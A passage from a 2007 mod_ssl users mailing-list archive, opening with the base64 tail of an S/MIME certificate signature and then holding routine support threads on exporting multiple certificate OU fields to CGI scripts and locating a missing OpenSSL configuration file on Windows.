yS0xPTMwElZFjqU2vnIECjHs3fb0/thZ82URriwaK7LWNnLl+ZH5fqRFHDM078Li3iMxTUKb9dnS
YlcFuyQ+A+YOTG+Dp3rRP6xqDGN3C2iqMwteIvHr/vjtfDCCBBYwggN/oAMCAQICAScwDQYJKoZI
hvcNAQEFBQAwYTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4gR292ZXJubWVudDEMMAoGA1UE
CxMDRG9EMQwwCgYDVQQLEwNQS0kxHDAaBgNVBAMTE0RvRCBDTEFTUyAzIFJvb3QgQ0EwHhcNMDMw
NjEwMDk1MjQxWhcNMDkwNjA4MDk1MjQxWjBfMQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBH
b3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEaMBgGA1UEAxMRRE9EIENMQVNT
IDMgQ0EtMTAwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAIl3jnkfyFSwDCl+lkhsALfMk7iX
sxSPtUc0tdqvf3lglnpXHWV/3kSMTNwWXHJ09SK+Zw0+k29h0sVkWR02CmTjau1sZRhh2+m5naAA
yHdgIOebAYHff5BJnzdXSnhlJ+kjaQchGe6gTVKVUr1yG5ocHAUOnghgFkPZ8RW5PWlTAgMBAAGj
ggHeMIIB2jAdBgNVHQ4EFgQUNScaMIweTaZge7ctOkYuS6kvKzAwDgYDVR0PAQH/BAQDAgGGMA8G
A1UdEwEB/wQFMAMBAf8wDAYDVR0kBAUwA4ABADAfBgNVHSMEGDAWgBRsnKXwXI9tQY3EFzuQV8IP
o81t/jAwBgNVHSAEKTAnMAsGCWCGSAFlAgELBTALBglghkgBZQIBCwkwCwYJYIZIAWUCAQsKMIGD
BgNVHRIEfDB6hnhsZGFwOi8vZHMtMy5jM3BraS5jaGFtYi5kaXNhLm1pbC9jbiUzZERvRCUyMENM
QVNTJTIwMyUyMFJvb3QlMjBDQSUyY291JTNkUEtJJTJjb3UlM2REb0QlMmNvJTNkVS5TLiUyMEdv
dmVybm1lbnQlMmNjJTNkVVMwgbAGA1UdHwSBqDCBpTCBoqCBn6CBnIaBmWxkYXA6Ly9kcy0zLmMz
cGtpLmNoYW1iLmRpc2EubWlsL2NuJTNkRG9EJTIwQ0xBU1MlMjAzJTIwUm9vdCUyMENBJTJjb3Ul
M2RQS0klMmNvdSUzZERvRCUyY28lM2RVLlMuJTIwR292ZXJubWVudCUyY2MlM2RVUz9jZXJ0aWZp
Y2F0ZXJldm9jYXRpb25saXN0O2JpbmFyeTANBgkqhkiG9w0BAQUFAAOBgQCmm1CSI3PtF0ENNidT
1nOG6KTVqh3340GqVusqwmwA/gUU0Ny7gmf4aMq02NiX5E7h/CTrSaLI1EcKwoDdwoPLOWd0huSU
LhrKGxHTsM3AxR8OcdOGO8dVbbNJv2iP0iNb7VaXvJ3XSQEbl3sPVP6Gy8Rl9TmFFrho7P0V+7Ot
aTCCBBwwggOFoAMCAQICASgwDQYJKoZIhvcNAQEFBQAwYTELMAkGA1UEBhMCVVMxGDAWBgNVBAoT
D1UuUy4gR292ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxHDAaBgNVBAMTE0Rv
RCBDTEFTUyAzIFJvb3QgQ0EwHhcNMDMwNjEwMDk1NTAxWhcNMDkwNjA4MDk1NTAxWjBlMQswCQYD
VQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAKBgNVBAsT
A1BLSTEgMB4GA1UEAxMXRE9EIENMQVNTIDMgRU1BSUwgQ0EtMTAwgZ8wDQYJKoZIhvcNAQEBBQAD
gY0AMIGJAoGBANQhe2pVqqwwtYkLXpPlJBxR3fip5SMYdRFf25JmURt8Zb1+KhM6CCOWxBmPJg3E
R/L5rPtSRFuuco6M+lSHDfKnRKepJFBUfSieHPeBCtvh35PSvjDKXEQMf5G+fmMcYL/HbHbDPrKx
UHx5SprkxqQKolLXpLcvbqlDu8565vBpAgMBAAGjggHeMIIB2jAdBgNVHQ4EFgQUbzcjpNMg6/QM
P2CfeUwLchDSPJcwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wDAYDVR0kBAUwA4AB
ADAfBgNVHSMEGDAWgBRsnKXwXI9tQY3EFzuQV8IPo81t/jAwBgNVHSAEKTAnMAsGCWCGSAFlAgEL
BTALBglghkgBZQIBCwkwCwYJYIZIAWUCAQsKMIGDBgNVHRIEfDB6hnhsZGFwOi8vZHMtMy5jM3Br
aS5jaGFtYi5kaXNhLm1pbC9jbiUzZERvRCUyMENMQVNTJTIwMyUyMFJvb3QlMjBDQSUyY291JTNk
UEtJJTJjb3UlM2REb0QlMmNvJTNkVS5TLiUyMEdvdmVybm1lbnQlMmNjJTNkVVMwgbAGA1UdHwSB
qDCBpTCBoqCBn6CBnIaBmWxkYXA6Ly9kcy0zLmMzcGtpLmNoYW1iLmRpc2EubWlsL2NuJTNkRG9E
JTIwQ0xBU1MlMjAzJTIwUm9vdCUyMENBJTJjb3UlM2RQS0klMmNvdSUzZERvRCUyY28lM2RVLlMu
JTIwR292ZXJubWVudCUyY2MlM2RVUz9jZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0O2JpbmFyeTAN
BgkqhkiG9w0BAQUFAAOBgQCnZVmnmbJyuKSZpTUKwp7gCLe3akj225PQOrhHx0gt64LH2fvDEwhC
riHO8jRGIyDdRCQiDpPe9u2Y/xK/wvIUWDUBPML/m+OwGODiuTF81N8egB7OtG+iq2sa2oU+97oi
1rYIFj4djZnvWz49FG9q5FTodfD1Yphd3hfJ6Y+DCTCCBEEwggOqoAMCAQICAx/mxDANBgkqhkiG
9w0BAQUFADBlMQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQL
EwNEb0QxDDAKBgNVBAsTA1BLSTEgMB4GA1UEAxMXRE9EIENMQVNTIDMgRU1BSUwgQ0EtMTAwHhcN
MDUxMDExMDAwMDAwWhcNMDgxMDAzMjM1OTU5WjCBgjELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1Uu
Uy4gR292ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxEzARBgNVBAsTCkNPTlRS
QUNUT1IxKDAmBgNVBAMTH1ZJQ1RPUi5EV0lHSFQuUEhJTElQLjEyNjg3NzMxMDYwgZ8wDQYJKoZI
hvcNAQEBBQADgY0AMIGJAoGBAK+HFyjqsB3OI0A8uLG3w9mg0cgzxa94OPJGtVK9SoFxMlwnSHcx
mobboTnCNHKOXmkN6MT8bPp8Omeppf0zHTzSzcacwv/EkPz4Zk20IDwceo2RevXy01u7U3777ZtW
1EzLrjAL6mY6oD2KXZG45OpJDjg4oNGbpo2k2WPTIP3bAgMBAAGjggHfMIIB2zAOBgNVHQ8BAf8E
BAMCBSAwJQYDVR0RBB4wHIEaZHdpZ2h0LnZpY3Rvci5jdHJAZGlzYS5taWwwHwYDVR0jBBgwFoAU
bzcjpNMg6/QMP2CfeUwLchDSPJcwHQYDVR0OBBYEFJGhNIbyEnLXIMahd22+LZAQg6FOMBYGA1Ud
IAQPMA0wCwYJYIZIAWUCAQsJMIGOBgNVHRIEgYYwgYOGgYBsZGFwOi8vZW1haWwtZHMtNC5jM3Br
aS5kZW4uZGlzYS5taWwvY24lM2RET0QlMjBDTEFTUyUyMDMlMjBFTUFJTCUyMENBLTEwJTJjb3Ul
M2RQS0klMmNvdSUzZERvRCUyY28lM2RVLlMuJTIwR292ZXJubWVudCUyY2MlM2RVUzCBuAYDVR0f
BIGwMIGtMIGqoIGnoIGkhoGhbGRhcDovL2VtYWlsLWRzLTQuYzNwa2kuZGVuLmRpc2EubWlsL2Nu
JTNkRE9EJTIwQ0xBU1MlMjAzJTIwRU1BSUwlMjBDQS0xMCUyY291JTNkUEtJJTJjb3UlM2REb0Ql
MmNvJTNkVS5TLiUyMEdvdmVybm1lbnQlMmNjJTNkVVM/Y2VydGlmaWNhdGVyZXZvY2F0aW9ubGlz
dDtiaW5hcnkwDQYJKoZIhvcNAQEFBQADgYEARRvrfgpwfPSmQh57wvP0UdjhVXud5CkqhR9jechp
Suv6zI81K5RazYSm3BZSGdKr7gbcpyYobSDRgYdI16VUqCnEHuuAB8+BqGmAvQ/5cj+XNnjdko41
ZCWsPVPDZ1h1FDH9xiVOSX5fbLJFIobWiLbcxdGtofPOGxSpA/oKNF0xggLSMIICzgIBATBmMF8x
CzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNVBAsTA0RvRDEMMAoG
A1UECxMDUEtJMRowGAYDVQQDExFET0QgQ0xBU1MgMyBDQS0xMAIDGfHTMAkGBSsOAwIaBQCgggHC
MBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTA3MDgwODE3NTM1OVow
IwYJKoZIhvcNAQkEMRYEFCSJHFzV3KwfAU4cMHijzHJSzSbLMGcGCSqGSIb3DQEJDzFaMFgwCgYI
KoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3
DQMCAgEoMAcGBSsOAwIaMAoGCCqGSIb3DQIFMHsGCSsGAQQBgjcQBDFuMGwwZTELMAkGA1UEBhMC
VVMxGDAWBgNVBAoTD1UuUy4gR292ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kx
IDAeBgNVBAMTF0RPRCBDTEFTUyAzIEVNQUlMIENBLTEwAgMf5sQwfQYLKoZIhvcNAQkQAgsxbqBs
MGUxCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNVBAsTA0RvRDEM
MAoGA1UECxMDUEtJMSAwHgYDVQQDExdET0QgQ0xBU1MgMyBFTUFJTCBDQS0xMAIDH+bEMA0GCSqG
SIb3DQEBAQUABIGAJpQ3RDxzVBnVREtqryHSiN86+rd6CcjMpjCOyQLrhNqcEDJaUip91w0clAc8
nQkaU3BK5ljWiGOfO0AeYWOvEtfZFhucCBQj6w54KhtHfMNBnLcmgVCeAEeNnP4D3fJ7XT4U0N6y
iSz6tDZUIe0LmdhKOnaDHvLMVYxm2T0ZFecAAAAAAAA=

------=_NextPart_000_001D_01C7D991.477D5570--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug  8 20:08:08 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EDD3D14D876; Wed,  8 Aug 2007 20:08:07 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cernmxlb.cern.ch (cernmx05.cern.ch [137.138.166.161])
	by master.modssl.org (Postfix) with ESMTP id 5365614D833
	for ; Wed,  8 Aug 2007 20:08:06 +0200 (CEST)
Keywords: CERN SpamKiller Note: -48 Charset: west-latin
Keywords: CERN SpamKiller Note: -48 Charset: west-latin
X-Filter: CERNMX05 CERN MX v2.0 060921.0942 Release
Received: from cernfe02.cern.ch ([137.138.28.243]) by cernmxlb.cern.ch with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 8 Aug 2007 20:07:59 +0200
Received: from lxplus204.cern.ch ([137.138.4.19]) by cernfe02.cern.ch over TLS secured channel with Microsoft SMTPSVC(6.0.3790.1830);
	 Wed, 8 Aug 2007 20:07:59 +0200
Date: Wed, 8 Aug 2007 20:07:53 +0200 (CEST)
From: Arsen Hayrapetyan 
X-X-Sender: ahairape@lxplus204.cern.ch
To: Joe Orton 
cc: modssl-users@modssl.org
Subject: Re: Multiple OU components in certificate subject DN and SSL_CLIENT_S_DN_OU
In-Reply-To: <20070807131721.GA1296@redhat.com>
Message-ID: 
References: 
 <20070807131721.GA1296@redhat.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-OriginalArrivalTime: 08 Aug 2007 18:07:59.0254 (UTC) FILETIME=[0D9EEB60:01C7D9E7]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Arsen Hayrapetyan 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello Joe,
Thank you very much for the exhaustive answer.

Best regards,
Arsen.

On Tue, 7 Aug 2007, Joe Orton wrote:

> On Tue, Aug 07, 2007 at 02:25:54PM +0200, Arsen Hayrapetyan wrote:
> > Hello,
> > 
> > I am setting up client authentication with X.509 certificates.
> > The client has the certificate subject DN of the following form:
> > /C=XX/O=YYY/OU=ZZZ/OU=PPP/CN=TTT
> > I need to catch both OUs in my perl CGI script. But when I am trying to
> > get the values of OUs with the foolowing piece of code:
> > 
> > $variable=$ENV{SSL_CLIENT_S_DN_OU};
> > print "$variable \n";
> > $variable=$ENV{SSL_CLIENT_S_DN_OU};
> > print "$variable \n";
> > 
> > both print statements print ZZZ (the first OU).
> > 
> > How can I catch both OUs in my CGI script? Does mod_ssl "see" the first OU
> > only?
> 
> It has access to them all, but only exports the first.
> 
> If you upgrade to 2.2.x, you could hack ssl_engine_kernel.c by adding:
> 
>  "SSL_CLIENT_S_DN_OU_0",
>  "SSL_CLIENT_S_DN_OU_1",
> 
> to the ssl_hook_Fixup_vars[] array.  This will force the first and 
> second OU field to be exported to CGI scripts in those named variables.  
> Note that this won't work with 2.0.x, which doesn't support the _N 
> suffix.
> 
> > My apache version is 2.0.55. However I don't know the version of mod_ssl.
> > By the way, how can I determine what version of mod_ssl module do I have?
> 
> mod_ssl is integrated into the httpd 2.x tree, so there is no separate 
> "versino".
> 
> joe
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 16 19:23:31 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9C54214D887; Thu, 16 Aug 2007 19:23:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from email02.consolidated.net (email02.consolidated.net [216.176.95.173])
	by master.modssl.org (Postfix) with ESMTP id 0F6E814D847
	for ; Thu, 16 Aug 2007 19:23:30 +0200 (CEST)
Received: from mtnsmtp02.consolidated.com (email2.consolidated.com [216.176.95.7])
	by email02.consolidated.net (MOS 3.8.3-GA)
	with ESMTP id KHG76402;
	Thu, 16 Aug 2007 12:23:20 -0500 (CDT)
Received: from mtnmail01.CONSOLIDATED.COM ([10.1.253.132])
          by mtnsmtp02.consolidated.com (Lotus Domino Release 7.0.1)
          with ESMTP id 2007081612231853-218712 ;
          Thu, 16 Aug 2007 12:23:18 -0500 
To: modssl-users@modssl.org
Subject: Question about setting up openssl with apache
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.1 January 17, 2006
Message-ID: 
From: Christa.Packer@consolidated.com
Date: Thu, 16 Aug 2007 12:23:17 -0500
X-MIMETrack: Serialize by Router on mtnmail01/consolidated(Release 7.0.1 HF581|April 25, 2007) at
 08/16/2007 12:23:18 PM,
	Serialize complete at 08/16/2007 12:23:18 PM,
	Itemize by SMTP Server on mtnsmtp02/consolidated(Release 7.0.1|January 17, 2006) at
 08/16/2007 12:23:18 PM,
	Serialize by Router on mtnsmtp02/consolidated(Release 7.0.1|January 17, 2006) at
 08/16/2007 12:23:20 PM,
	Serialize complete at 08/16/2007 12:23:20 PM
Content-Type: multipart/alternative; boundary="=_alternative 005F845D86257339_="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christa.Packer@consolidated.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multipart message in MIME format.
--=_alternative 005F845D86257339_=
Content-Type: text/plain; charset="US-ASCII"

We're using apache and its reverse proxy features to access domino 
servers.  Working well, but would like to add SSL to secure it before we 
make it available to the web.  We have installed Apache 2.2.3 on a Windows 
2003 server with openssl 0.9.8c.  When I try to create a certificate 
signing request it says it is unable to load config info form 
c:\opensll\openssl.conf.  I don't have this directory or file on the 
server.  Is there something additional I need to install or configure, or 
do I need to just copy an example conf file and edit appropriately.

Sorry for such a basic question, this is my first exposure to openssl and 
I've scoured the docs.

Thanks for any assistance.

Christa







Christa A. Packer
Consolidated Communications
Systems Administrator
christa.packer@consolidated.com
217-235-3335

--=_alternative 005F845D86257339_=
Content-Type: text/html; charset="US-ASCII"



We're using apache and its reverse proxy
features to access domino servers.  Working well, but would like to
add SSL to secure it before we make it available to the web.  We have
installed Apache 2.2.3 on a Windows 2003 server with openssl 0.9.8c.  When
I try to create a certificate signing request it says it is unable to load
config info form c:\opensll\openssl.conf.  I don't have this directory
or file on the server.  Is there something additional I need to install
or configure, or do I need to just copy an example conf file and edit appropriately.



Sorry for such a basic question, this
is my first exposure to openssl and I've scoured the docs.



Thanks for any assistance.



Christa















Christa A. Packer

Consolidated Communications

Systems Administrator

christa.packer@consolidated.com

217-235-3335


--=_alternative 005F845D86257339_=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 16 21:54:38 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0399F14D8A6; Thu, 16 Aug 2007 21:54:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web25407.mail.ukl.yahoo.com (web25407.mail.ukl.yahoo.com [217.12.10.141])
	by master.modssl.org (Postfix) with SMTP id A051214D857
	for ; Thu, 16 Aug 2007 21:54:37 +0200 (CEST)
Received: (qmail 81680 invoked by uid 60001); 16 Aug 2007 19:54:30 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.co.uk;
  h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=y5BCnEisElyFywIgEzP/6A+4G9YLn0g7c/KfWg/J3nVGk7sUKYbm5GharloLuSZtybjpKm+JjjCCRDTMdvkWlPy9jQ/t1drVckCRAmzYf8sJ3k1cjx0LkFJpDpKfbj7CMe4SLMfml40iSIlJJsG7BP5GkvpVlAXyGXBly7Ny3Q4=;
X-YMail-OSG: DVHD5wgVM1k2a7zeZWfU9QHJyNTlKF4TgVtrTFVmu1Dhvt5p2k4kQOkHsKr5QECIfsnsjIU4DWsDC5HGEsNUIzusrqrvNc0y2ZqapbqiJbFLBir5fTDJqcNMs5Q-
Received: from [81.104.240.100] by web25407.mail.ukl.yahoo.com via HTTP; Thu, 16 Aug 2007 20:54:29 BST
Date: Thu, 16 Aug 2007 20:54:29 +0100 (BST)
From: Glyn Astill 
Subject: Re: Question about setting up openssl with apache
To: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <988815.81503.qm@web25407.mail.ukl.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glyn Astill 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

When I installed openssl here on Netbsd it put an example config file
in /usr/share/examples/openssl/openssl.cnf and I copied that. Have
you searched to see if there is one anywhere?




--- Christa.Packer@consolidated.com wrote:

> We're using apache and its reverse proxy features to access domino 
> servers.  Working well, but would like to add SSL to secure it
> before we 
> make it available to the web.  We have installed Apache 2.2.3 on a
> Windows 
> 2003 server with openssl 0.9.8c.  When I try to create a
> certificate 
> signing request it says it is unable to load config info form 
> c:\opensll\openssl.conf.  I don't have this directory or file on
> the 
> server.  Is there something additional I need to install or
> configure, or 
> do I need to just copy an example conf file and edit appropriately.
> 
> Sorry for such a basic question, this is my first exposure to
> openssl and 
> I've scoured the docs.
> 
> Thanks for any assistance.
> 
> Christa
> 
> 
> 
> 
> 
> 
> 
> Christa A. Packer
> Consolidated Communications
> Systems Administrator
> christa.packer@consolidated.com
> 217-235-3335
> 



Glyn Astill



      ___________________________________________________________ 
Want ideas for reducing your carbon footprint? Visit Yahoo! For Good  http://uk.promotions.yahoo.com/forgood/environment.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 16 21:57:19 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5DEE614D89E; Thu, 16 Aug 2007 21:57:19 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from email02.consolidated.net (email02.consolidated.net [216.176.95.173])
	by master.modssl.org (Postfix) with ESMTP id D3E6714D847
	for ; Thu, 16 Aug 2007 21:57:18 +0200 (CEST)
Received: from mtnsmtp02.consolidated.com (email2.consolidated.com [216.176.95.7])
	by email02.consolidated.net (MOS 3.8.3-GA)
	with ESMTP id KHH06324;
	Thu, 16 Aug 2007 14:57:08 -0500 (CDT)
Received: from mtnmail01.CONSOLIDATED.COM ([10.1.253.132])
          by mtnsmtp02.consolidated.com (Lotus Domino Release 7.0.1)
          with ESMTP id 2007081614570822-227446 ;
          Thu, 16 Aug 2007 14:57:08 -0500 
In-Reply-To: <988815.81503.qm@web25407.mail.ukl.yahoo.com>
To: modssl-users@modssl.org
Subject: Re: Question about setting up openssl with apache
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.1 January 17, 2006
Message-ID: 
From: Christa.Packer@consolidated.com
Date: Thu, 16 Aug 2007 14:57:07 -0500
X-MIMETrack: Serialize by Router on mtnmail01/consolidated(Release 7.0.1 HF581|April 25, 2007) at
 08/16/2007 02:57:08 PM,
	Serialize complete at 08/16/2007 02:57:08 PM,
	Itemize by SMTP Server on mtnsmtp02/consolidated(Release 7.0.1|January 17, 2006) at
 08/16/2007 02:57:08 PM,
	Serialize by Router on mtnsmtp02/consolidated(Release 7.0.1|January 17, 2006) at
 08/16/2007 02:57:08 PM
Content-Type: multipart/alternative; boundary="=_alternative 006D997386257339_="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christa.Packer@consolidated.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multipart message in MIME format.
--=_alternative 006D997386257339_=
Content-Type: text/plain; charset="US-ASCII"

Thanks very much.  I found it.


Christa






Glyn Astill  
Sent by: owner-modssl-users@modssl.org
08/16/2007 02:54 PM
Please respond to
modssl-users@modssl.org


To
modssl-users@modssl.org
cc

Subject
Re: Question about setting up openssl with apache






When I installed openssl here on Netbsd it put an example config file
in /usr/share/examples/openssl/openssl.cnf and I copied that. Have
you searched to see if there is one anywhere?




--- Christa.Packer@consolidated.com wrote:

> We're using apache and its reverse proxy features to access domino 
> servers.  Working well, but would like to add SSL to secure it
> before we 
> make it available to the web.  We have installed Apache 2.2.3 on a
> Windows 
> 2003 server with openssl 0.9.8c.  When I try to create a
> certificate 
> signing request it says it is unable to load config info form 
> c:\opensll\openssl.conf.  I don't have this directory or file on
> the 
> server.  Is there something additional I need to install or
> configure, or 
> do I need to just copy an example conf file and edit appropriately.
> 
> Sorry for such a basic question, this is my first exposure to
> openssl and 
> I've scoured the docs.
> 
> Thanks for any assistance.
> 
> Christa
> 
> 
> 
> 
> 
> 
> 
> Christa A. Packer
> Consolidated Communications
> Systems Administrator
> christa.packer@consolidated.com
> 217-235-3335
> 



Glyn Astill



      ___________________________________________________________ 
Want ideas for reducing your carbon footprint? Visit Yahoo! For Good  
http://uk.promotions.yahoo.com/forgood/environment.html
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


--=_alternative 006D997386257339_=
Content-Type: text/html; charset="US-ASCII"



Thanks very much.  I found it.





Christa
















Glyn Astill <glynastill@yahoo.co.uk>


Sent by: owner-modssl-users@modssl.org

08/16/2007 02:54 PM






Please respond to

modssl-users@modssl.org











To

modssl-users@modssl.org




cc






Subject

Re: Question about setting up openssl
with apache

















When I installed openssl here on Netbsd it put an
example config file

in /usr/share/examples/openssl/openssl.cnf and I copied that. Have

you searched to see if there is one anywhere?









--- Christa.Packer@consolidated.com wrote:



> We're using apache and its reverse proxy features to access domino


> servers.  Working well, but would like to add SSL to secure it

> before we 

> make it available to the web.  We have installed Apache 2.2.3
on a

> Windows 

> 2003 server with openssl 0.9.8c.  When I try to create a

> certificate 

> signing request it says it is unable to load config info form 

> c:\opensll\openssl.conf.  I don't have this directory or file
on

> the 

> server.  Is there something additional I need to install or

> configure, or 

> do I need to just copy an example conf file and edit appropriately.

> 

> Sorry for such a basic question, this is my first exposure to

> openssl and 

> I've scoured the docs.

> 

> Thanks for any assistance.

> 

> Christa

> 

> 

> 

> 

> 

> 

> 

> Christa A. Packer

> Consolidated Communications

> Systems Administrator

> christa.packer@consolidated.com

> 217-235-3335

> 







Glyn Astill







      ___________________________________________________________


Want ideas for reducing your carbon footprint? Visit Yahoo! For Good  http://uk.promotions.yahoo.com/forgood/environment.html

______________________________________________________________________

Apache Interface to OpenSSL (mod_ssl)          
        www.modssl.org

User Support Mailing List              
       modssl-users@modssl.org

Automated List Manager              
             majordomo@modssl.org




--=_alternative 006D997386257339_=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 16 22:07:23 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 103AB14D8A6; Thu, 16 Aug 2007 22:07:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web25405.mail.ukl.yahoo.com (web25405.mail.ukl.yahoo.com [217.12.10.139])
	by master.modssl.org (Postfix) with SMTP id 83BCC14D847
	for ; Thu, 16 Aug 2007 22:07:22 +0200 (CEST)
Received: (qmail 58581 invoked by uid 60001); 16 Aug 2007 20:07:15 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.co.uk;
  h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=GsKOpZDIfQiy3vEBMeJtj1OOl1cH73gVlZ3JHXiqKBmxMp8qbjUQNS5+e7G0/+pilDSFTSxK/Jkhxb6LJFu1MdUKM8N1SVB/kHsS7Sj1q0GR3MhN92zYAJZ/mv6i3qJMoK/gJP8zHo143N9UKWafoScIWu7FH4GsjUaXh2mUYE0=;
X-YMail-OSG: gtyclS8VM1nL119W1Y0HghHWGopjtdUDH80T4wTnUpOkbfz7mtM5_7BJxnzeCwrktKc5mAilsT7FKlQqrVe6VmOXEJvkHlLR6mCz2jIP7zYbs_caZPClwIBvAn8-
Received: from [81.104.240.100] by web25405.mail.ukl.yahoo.com via HTTP; Thu, 16 Aug 2007 21:07:14 BST
Date: Thu, 16 Aug 2007 21:07:14 +0100 (BST)
From: Glyn Astill 
Subject: Re: Question about setting up openssl with apache
To: modssl-users@modssl.org
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <890535.58254.qm@web25405.mail.ukl.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glyn Astill 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

ace.

--- Christa.Packer@consolidated.com wrote:

> Thanks very much.  I found it.
> 
> 
> Christa
> 
> 
> 
> 
> 
> 
> Glyn Astill  
> Sent by: owner-modssl-users@modssl.org
> 08/16/2007 02:54 PM
> Please respond to
> modssl-users@modssl.org
> 
> 
> To
> modssl-users@modssl.org
> cc
> 
> Subject
> Re: Question about setting up openssl with apache
> 
> 
> 
> 
> 
> 
> When I installed openssl here on Netbsd it put an example config
> file
> in /usr/share/examples/openssl/openssl.cnf and I copied that. Have
> you searched to see if there is one anywhere?
> 
> 
> 
> 
> --- Christa.Packer@consolidated.com wrote:
> 
> > We're using apache and its reverse proxy features to access
> domino 
> > servers.  Working well, but would like to add SSL to secure it
> > before we 
> > make it available to the web.  We have installed Apache 2.2.3 on
> a
> > Windows 
> > 2003 server with openssl 0.9.8c.  When I try to create a
> > certificate 
> > signing request it says it is unable to load config info form 
> > c:\opensll\openssl.conf.  I don't have this directory or file on
> > the 
> > server.  Is there something additional I need to install or
> > configure, or 
> > do I need to just copy an example conf file and edit
> appropriately.
> > 
> > Sorry for such a basic question, this is my first exposure to
> > openssl and 
> > I've scoured the docs.
> > 
> > Thanks for any assistance.
> > 
> > Christa
> > 
> > 
> > 
> > 
> > 
> > 
> > 
> > Christa A. Packer
> > Consolidated Communications
> > Systems Administrator
